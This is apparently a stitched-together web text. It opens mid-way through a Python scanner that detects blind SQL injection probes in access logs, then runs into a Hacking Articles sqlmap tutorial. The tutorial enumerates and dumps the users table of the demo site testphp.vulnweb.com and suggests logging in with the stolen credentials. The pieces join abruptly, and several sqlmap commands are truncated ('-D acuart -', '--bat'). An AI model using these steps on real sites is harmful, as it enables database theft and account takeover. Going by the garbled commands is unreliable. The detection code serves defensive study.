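    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        names = classify_uri(m["uri"])
        # A quote followed by AND/OR on its own is weak evidence (a search for
        # "black 'and' white" triggers it), so count a request as a probe only when
        # it also carries a length() or ascii(substr()) comparison.
        if "length-probe" in names or "ascii-substr-probe" in names:
            hits.append((m["ip"], m["uri"], names))
            per_ip[m["ip"]] += 1
    enumerating = sorted(ip for ip, n in per_ip.items() if n >= burst_threshold)
    return {"hits": hits, "per_ip": dict(per_ip), "enumerating_ips": enumerating}


if __name__ == "__main__":
    report = scan_access_log(SAMPLE_LOG)
    for ip, uri, names in report["hits"]:
        print(f"{ip}  {', '.join(names)}  {uri}")
    print("probe count per IP:", report["per_ip"])
    print("IPs over burst threshold:", report["enumerating_ips"])
```

Run on the constructed log, the scanner reports six probe requests, five of them from 10.0.0.5, which is the only address over the burst threshold; the apostrophe in the search.php request matches the quote pattern but is not counted, which is the check worth keeping when tuning a rule like this against real traffic, where single quotes in user input are common and the comparison constructs are not.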

Hence today we learned how an attacker hacks a database using blind SQL injection.

!!Try yourself to retrieve the password for user dumb!!

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets. Contact here

Database Penetration Testing using Sqlmap (Part 1)

posted in DATABASE HACKING, KALI LINUX, PENETRATION TESTING on JUNE 28, 2017 by RAJ CHANDEL with 0 COMMENT

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features

Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft
Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix
database management systems.
Full support for six SQL injection techniques: boolean-based blind, time-based blind,
error-based, UNION query-based, stacked queries and out-of-band.
Support to directly connect to the database without passing via a SQL injection, by
providing DBMS credentials, IP address, port and database name.
Support to enumerate users, password hashes, privileges, roles, databases, tables and
columns.
Automatic recognition of password hash formats and support for cracking them
using a dictionary-based attack.
Support to dump database tables entirely, a range of entries or specific columns as
per user’s choice. The user can also choose to dump only a range of characters from
each column’s entry.
Support to search for specific database names, specific tables across all databases or
specific columns across all databases’ tables. This is useful, for instance, to identify
tables containing custom application credentials where relevant columns’ names
contain strings like name and pass.

Support to download and upload any file from the database server underlying file
system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
Support to execute arbitrary commands and retrieve their standard output on the
database server underlying operating system when the database software is MySQL,
PostgreSQL or Microsoft SQL Server.
Support to establish an out-of-band stateful TCP connection between the attacker
machine and the database server underlying operating system. This channel can be
an interactive command prompt, a Meterpreter session or a graphical user interface
(VNC) session as per user’s choice.
Support for database process’ user privilege escalation via Metasploit’s Meterpreter
getsystem command.

These options can be used to enumerate the back-end database management system
information, structure and data contained in the tables.

Sometimes you visit websites that let you select a product item through their picture gallery; if you observe the URL you will notice that the product item is called through its product-ID number.

Let’s take an example:
http://testphp.vulnweb.com/artists.php?artist=1

So when an attacker visits such a website he always checks for a SQL vulnerability in the web server before launching a SQL attack.

Let’s check how an attacker verifies a SQL vulnerability.

The attacker will try to break the query in order to get an error message; if he successfully receives an error message it confirms that the web server is affected by SQL injection.
http://testphp.vulnweb.com/artists.php?artist=1'

From the screenshot you can see we have received the error message successfully; now we will make the SQL attack on the web server so that we can fetch database information.

Databases
For database penetration testing we always choose SQLMAP; this tool is very helpful for beginners who are unable to retrieve database information manually or are unaware of SQL injection techniques.

Open the terminal in your Kali Linux and type the following command, which starts the SQL injection attack on the targeted website.
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs --bat

-u: target URL

--dbs: fetch database names

--batch: this lets sqlmap go with its default behaviour whenever user input would be required

Here from the given screenshot you can see we have successfully retrieved the database name “acuart”.

Tables
As we know, a database is a set of records consisting of multiple tables; therefore now use another command in order to fetch all the table names from inside the database system.
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -

-D: DBMS database to enumerate (fetched database name)

--tables: enumerate DBMS database tables

As a result, as shown in the screenshot, we have enumerated all the table names of the database system. There are 8 tables inside database “acuart”, as follows:

T1: artists

T2: carts

T3: categ

T4: featured

T5: guestbook

T6: pictures

T7: products

T8: users

Columns
Now we will try to enumerate the column names of the desired table. Since we know there is a users table inside the database acuart and we want to know all the column names of the users table, we generate another command for column enumeration.
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -

-T: DBMS table to enumerate (fetched table name)

--columns: enumerate DBMS database columns

Get data from a table

Slowly and gradually we have penetrated many details of the database, but the last and most important step is to retrieve the information from inside the columns of a table. Hence at last we generate a command which dumps the information of the users table.
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -

--dump: dump all information of the DBMS database

Here from the given screenshot you can see it has dumped the entire contents of table users; mainly the users table contains the login credentials of other users. You can use these credentials to log into the server on behalf of other users.

Dump All
The last command is the most powerful command in sqlmap and will save your time in database penetration testing; this command performs all the above functions at once and dumps the entire database information, including table names, columns and so on.
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -

This gives you all the information at once, including the database name as well as the tables’ records.

Try it yourself!!!

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets. Contact here
